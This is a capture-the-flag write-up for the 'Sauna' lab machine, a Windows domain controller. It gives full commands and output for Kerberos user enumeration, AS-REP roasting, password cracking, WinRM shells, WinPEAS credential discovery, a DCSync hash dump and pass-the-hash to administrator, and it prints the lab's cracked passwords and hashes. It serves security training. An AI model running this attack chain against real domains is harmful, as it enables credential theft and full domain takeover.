Sauna

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.175 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Sat Apr  1 12:34:41 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.051s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49668/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49698/tcp open  unknown

# Nmap done at Sat Apr  1 12:35:21 2023 -- 1 IP address (1 host up) scanned in 39.58 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p53,80,88,135,139,445,464,593,636,3268,3269,5985,9389,49668,49673,49674,49677,49689,49698 10.10.10.175 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Sat Apr  1 12:36:27 2023 as: nmap -sCV -p53,80,88,135,139,445,464,593,636,3268,3269,5985,9389,49668,49673,49674,49677,49689,49698 -Pn -n -oN targeted 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.042s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-01 17:36:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m01s
| smb2-time: 
|   date: 2023-04-01T17:37:28
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr  1 12:38:03 2023 -- 1 IP address (1 host up) scanned in 95.96 seconds

Let's start by enumerating the SMB service. As we can see the domain is EGOTISTICAL-BANK.LOCAL.

crackmapexec winrm 10.10.10.175

SMB         10.10.10.175    5985   SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP        10.10.10.175    5985   SAUNA            [*] http://10.10.10.175:5985/wsman

Let's add the found domain together with the SAUNA.EGOTISTICAL-BANK.LOCAL subdomain to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL  SAUNA.EGOTISTICAL-BANK.LOCAL

As port 88 (Kerberos) is open, we could enumerate possible domain users with the kerbrute tool.

kerbrute_linux_amd64 userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL /opt/SecLists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/02/23 - Ronnie Flathers @ropnop

2023/04/02 12:06:32 >  Using KDC(s):
2023/04/02 12:06:32 >   10.10.10.175:88

2023/04/02 12:06:41 >  [+] VALID USERNAME:       administrator@EGOTISTICAL-BANK.LOCAL
2023/04/02 12:07:29 >  [+] VALID USERNAME:       hsmith@EGOTISTICAL-BANK.LOCAL
2023/04/02 12:07:37 >  [+] VALID USERNAME:       Administrator@EGOTISTICAL-BANK.LOCAL
2023/04/02 12:08:05 >  [+] VALID USERNAME:       fsmith@EGOTISTICAL-BANK.LOCAL
2023/04/02 12:12:24 >  [+] VALID USERNAME:       Fsmith@EGOTISTICAL-BANK.LOCAL

Exploitation

Now that we know some valid users, put them into the users file, and let's try to perform an ASREPRoast attack.

ASREPRoast attack: when a user does not need pre-authentication, it is possible to obtain a TGT, without knowing the user's credentials, which contains data encrypted with the user's hash, which can be used for offline cracking.

impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -no-pass -usersfile users

• -no-pass don't ask for password.

• -usersfile file which contains user per line.

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User administrator@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hsmith@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL:34fde6ec753968064ea0fd141da0995d$c6a395188b9d5bc69ae7bcf8d9d395c38ce2d7706439e8b273d117a202c5a738d39e27fc426a4cffd50fac60e5f500ef67067af33bc5425f57021da1ff80fd56460ae125d3ebc5b3d43e7c49f16f5252373e3a6646938460bb2b5522fc6be544e649857d1a6f57cf75cc84b7d637b497dd3856a0ab9b248c7f34a375264d997afa82cc1fe94970da4d189c3dd4b18e4e4f9b8b865768889c6c10133d01d3344f93577b33033a2d86774c5f6357d33c326fbe83cd65f93078aeac0ccfb58581c459f16a9c0abe578fd164ff31d70c9a6404ae521db04a43146de874516b9d76462ac03c9c3aa9368d32170bd803b0dc21f30dd0e8fb43e1bdab9ce0da54cb41e7
$krb5asrep$23$Fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL:0d955097f63d940fcdd84389bb289a27$8c2f6a716e24da9a3fe893d579efaed9752a1453e7e8a13d6dadaa66a777612338cfacc659b0a5f493f84e435e64e0d837d5969bc9bce1419af0ef353233ae4e3e735ecc909035e4e3aa92b7c7df587cd1408d4fe9a5f551b5073d9ffd0726687b4beb3d4c2f7e40d065535a2271c6ce222d2d3f636d37785cd962789b2f500acb89e71f55288e588033272b56700411286a1c25b2f7112108da85aca7c636bb119f37a594276c73dd3747fd4502cc80608f9cef6dbe6aa4770e7bd66e39692281fc3eca6af908bb4859de0a03a79fd46bca7661b3241ecaa521a12121dc6a487eb86ff2d0ef01fc0664f59f945f5c0740fc29f9bea6e205524f75bb17f091e8

We get the hash of the fsmith user. Let's break it with john.

john -w=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL)     
1g 0:00:00:07 DONE (2023-04-02 12:21) 0.1251g/s 1319Kp/s 1319Kc/s 1319KC/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now we have valid credentials for the fsmith user.

crackmapexec winrm 10.10.10.175 -u "fsmith" -p "Thestrokes23"

SMB         10.10.10.175    5985   SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP        10.10.10.175    5985   SAUNA            [*] http://10.10.10.175:5985/wsman
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)

As seen above, the fsmith user seems to be a member of the Remote Management Users group, because it is possible to get a shell as him via WinRM. Then, we'll be able to grab the user flag.

evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> type \users\fsmith\desktop\user.txt
99bb03df1359aa92126e0ac4bb06e325

Privilege Escalation

If you try to enumerate the system manually, you will not find much. Let's run WinPEAS and see what it tells us.

WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. You can download it from the official Github page:

https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

Upload the binary to the system, and execute it.

upload /home/alfa8sa/tools/privEsc/winPEASany.exe

.\winPEASany.exe

...
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
...

It found credentials for the svc_loanmanager user. That user does not exist, but there is a username with a similar username called svc_loanmgr.

net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

Let's verify that the credentials are valid.

crackmapexec winrm 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'

SMB         10.10.10.175    5985   SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP        10.10.10.175    5985   SAUNA            [*] http://10.10.10.175:5985/wsman
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)

Now we need to find a way to escalate privileges to NT AUTHORITY\SYSTEM. As we are facing a domain controller, it would be helpful to run BloodHound with the bloodhound-python tool.

bloodhound-python -c All -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL

INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 08S

Now, we have to start BloodHound. First, we have to start neo4j.

neo4j console

Then we will search for the localhost on port 4747 and log in with the username neo4j and password neo4j. You’ll have to change the password.

On a new console, run BloodHound.

bloodhound -nosandbox

Then log in with the credentials you set up earlier.

Then, click on the Upload Data button on the right section and select all the .json files.

Once all the .json files are uploaded go to the Analysis section. There we'll see that the user svc_loanmgr user has DCSync rights.

As we have his credentials, we can dump hashes of every local user remotely with secrets-dump.

impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7c56034d7a5cc6607a1358ec119db26b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:a7f6d6836c1bfe62f3fd3d39e00378679001382f8a89c6e8362c369e9f11f940
SAUNA$:aes128-cts-hmac-sha1-96:5b4b8e0e33b6187c11838aac24ff11c7
SAUNA$:des-cbc-md5:fb495857760123ea
[*] Cleaning up...

Now that we have the NTLM hash of the administrator, we can get a shell using Pass The Hash. Then, all we have to do is reap the harvest and take the root flag.

evil-winrm -i 10.10.10.175 -u 'administrator' -H 823452073d75b9d1cf70ebdf86c7f98e

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
6eaf06be24b9c3df464cdd242bf7ebb4